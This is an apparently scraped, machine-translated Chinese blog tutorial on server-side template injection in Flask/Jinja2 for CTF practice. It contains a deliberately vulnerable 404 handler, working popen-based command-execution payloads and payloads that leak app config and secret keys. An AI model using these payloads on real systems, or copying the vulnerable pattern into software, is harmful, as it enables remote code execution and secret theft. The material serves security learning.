当前位置:网站首页>SSTI template injection explanation and real problem practice
SSTI template injection explanation and real problem practice
2022-07-06 03:47:00 【Advertising fever】
0x00 SSTI
1. What is? SSTI Inject ?
SSTI Template Injection (Server-Side Template Injection), Through the interface with the server-side template Input output interaction , In the case of lax filtering , Construct malicious input data , So as to read files or getshell Purpose , at present CTF common SSTI In question , Most of them are exams python Of .
2. Causes and utilization conditions
The website processes the output pages by the data and template framework , Our data will not change in the database , But the template of the picture can be converted in various ways , Different templates can give people different visual feelings , But when the template has controllable parameter variables or the template code has the debugging function of the template , May lead to ssti Template Injection , This injection exists for most script types . It's common for python Of CTF More test sites
3. What are the hazards ?
It can cause file reading , Command execution , Code execution, etc
paylaod Analytical reference :
0x01 Case understanding SSTI
Sensitive function phrases :
flask
render_template_string
Python Case study :
from flask import Flask
from flask import request
from flask import config
from flask import render_template_string
app = Flask(__name__)
app.config['SECRET_KEY'] = "flag{SSTI_123456}"
@app.route('/')
def hello_world():
return 'Hello World!'
@app.errorhandler(404)
def page_not_found(e):
template = '''
{%% block body %%}
<div class="center-content error">
<h1>Oops! That page doesn't exist.</h1>
<h3>%s</h3> #%s obtain 404_url Parameter the contents of the following fields , So as to input controllable variable injection
</div>
{%% endblock %%}
''' % (request.args.get('404_url'))
return render_template_string(template), 404
if __name__ == '__main__':
app.run(host='0.0.0.0',debug=True)
Can be python Script execution , Injection of being
adopt payload type , can RCE Read files and operate the machine
os._wrap_close In the class popen.
"".__class__.__bases__[0].__subclasses__()[128].__init__.__globals__['popen']('whoami').read()
"".__class__.__bases__[0].__subclasses__()[128].__init__.__globals__.popen('whoami').read()
0x02 CTF Case study
https://buuoj.cn/
Title Page :
structure 2-2 perform , That there is ssti Injection execution
View all global variables , Reference global variables
Use global variables to get the following config value
url_for() Function is used to build the specified function of operation URL
get_flashed_messages() The function is to get the passed data
Get global variables
/shrine/{
{url_for.__globals__}}
or
/shrine/{
{get_flashed_messages.__globals__}}
Use the current global variable to read :
/shrine/{
{url_for.__globals__['current_app'].config}}
or
/shrine/{
{get_flashed_messages.__globals__['current_app'].config}}
Add : pyc Decompile knowledge points
pyc It is also a form of script encapsulation , Be similar to
aspx:DLL file
java:.class/jar/war file
pyc Is a decompilable package , There are also those that are difficult to decompile pyd Wait for the documents
pyc Decompile reference website :
Decompile platform :
https://tool.lu/pyc/
http://tools.bugscaner.com/decompyle/
decompiler :https://github.com/wibiti/uncompyle2
边栏推荐
- Cross origin cross domain request
- Exchange bottles (graph theory + thinking)
- Svg drag point crop image JS effect
- On Data Mining
- Plus d'un milliard d'utilisateurs de grandes entreprises comme Facebook ont été compromis, il est temps de se concentrer sur le did
- 【按键消抖】基于FPGA的按键消抖模块开发
- 【Qt5】Qt QWidget立刻出现并消失
- 2.13 weekly report
- Differential GPS RTK thousand search
- three. JS page background animation liquid JS special effect
猜你喜欢
RT thread -- FTP of LwIP (2)
[slam] orb-slam3 parsing - track () (3)
Cubemx 移植正点原子LCD显示例程
Flask learning and project practice 9: WTF form verification
[meisai] meisai thesis reference template
Do you know cookies, sessions, tokens?
C#(三十)之C#comboBox ListView treeView
BUAA喜鹊筑巢
1.16 - check code
The ECU of 21 Audi q5l 45tfsi brushes is upgraded to master special adjustment, and the horsepower is safely and stably increased to 305 horsepower
随机推荐
C#(二十九)之C#listBox checkedlistbox imagelist
[001] [stm32] how to download STM32 original factory data
在 .NET 6 中使用 Startup.cs 更简洁的方法
如何修改表中的字段约束条件(类型,default, null等)
[practical exercise] face location model based on skin color
遥感图像超分辨率论文推荐
[Massey] Massey font format and typesetting requirements
Exchange bottles (graph theory + thinking)
2、GPIO相关操作
Svg drag point crop image JS effect
Blue Bridge Cup - day of week
C language circular statement
KS003基于JSP和Servlet实现的商城系统
SWC introduction
Overview of super-resolution reconstruction of remote sensing images
JVM的手术刀式剖析——一文带你窥探JVM的秘密
Cross origin cross domain request
Plus d'un milliard d'utilisateurs de grandes entreprises comme Facebook ont été compromis, il est temps de se concentrer sur le did
Align items and align content in flex layout
User perceived monitoring experience